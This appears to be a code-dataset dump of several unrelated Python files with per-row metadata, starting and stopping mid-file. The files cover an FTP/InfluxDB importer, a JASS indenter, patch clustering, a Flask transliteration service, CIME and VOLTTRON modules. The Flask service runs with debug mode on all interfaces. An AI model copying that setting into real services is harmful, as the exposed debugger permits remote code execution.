dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| en | 0.204884 | # --------------------------------------------------------------------------- # # Importing section # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Functions # -----------------------------------------------------------------------------# # --------------------------------------------------------------------------- # # Main # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Configuration file # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Set logging object # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Starting program # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # InfluxDB connection # --------------------------------------------------------------------------- # # Download files from the FTP server # Insert data into InfluxDB # Delete files correctly handled on the FTP server and close the FTP connection # Slack alert | 2.07851 | 2 |
autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | 117 | 8016 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| en | 0.31289 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction # Add empty line after endglobals and endfunction function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction | 2.414252 | 2 |
python/addNewData.py | TruX-DTF/fixminer_source | 5 | 8017 | from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| en | 0.474212 | # actions = listdir(join(clusterPath,root,size)) # for action in actions: # pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0] # 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc'] # # # elif job == 'importShapesPairs': # actions = listdir(join(clusterPath,root,size)) # for action in actions: # actions = listdir(join(clusterPath,root,size)) # for action in actions: # pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0] # for idx, clus in enumerate(cluster): # logging.info('exporting cluster %s %s %s %d', root,s,action,idx) # for f in clus: # dumpFile = pathMapping[1][int(f)] # # t = dumpFile,root,level,clusterPath,s,action,token,idx # workList.append(t) # for wl in workList: # dumpFilesCore(wl) | 2.115445 | 2 |
app.py | aosjehdgus/transliteration | 0 | 8018 | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Flask 객체 선언, 파라미터로 어플리케이션 패키지의 이름을 넣어 준다.
app.config['JSON_AS_ASCII'] = False # 한글 데이터 전송을 위해서 설정해 준다.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Flask 객체 선언, 파라미터로 어플리케이션 패키지의 이름을 넣어 준다.
app.config['JSON_AS_ASCII'] = False # 한글 데이터 전송을 위해서 설정해 준다.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| ko | 1.000029 | # -*- coding: utf-8 -*- # Flask 객체 선언, 파라미터로 어플리케이션 패키지의 이름을 넣어 준다. # 한글 데이터 전송을 위해서 설정해 준다. | 2.951135 | 3 |
pyano2/apps.py | mental689/pyano | 1 | 8019 | from django.apps import AppConfig
class Pyano2Config(AppConfig):
name = 'pyano2'
| from django.apps import AppConfig
class Pyano2Config(AppConfig):
name = 'pyano2'
| none | 1 | 1.257219 | 1 |
|
cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | 1 | 8020 | <reponame>cbeall123/E3SM
"""
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema)
| """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema) | en | 0.641463 | Interface to the env_build.xml file. This class inherits from EnvBase # pylint: disable=unused-argument initialize an object interface to file env_build.xml in the case directory | 2.144277 | 2 |
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | 1 | 8021 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads volttron.log file size every hour,
compute the size delta from previous hour and publish the difference
with timestamp. It also publishes standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes file's size increment in previous time interval (60 minutes)
with timestamp.
Also publishes standard deviation of file's hourly size differences
every 24 hour.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads volttron.log file size every hour,
compute the size delta from previous hour and publish the difference
with timestamp. It also publishes standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
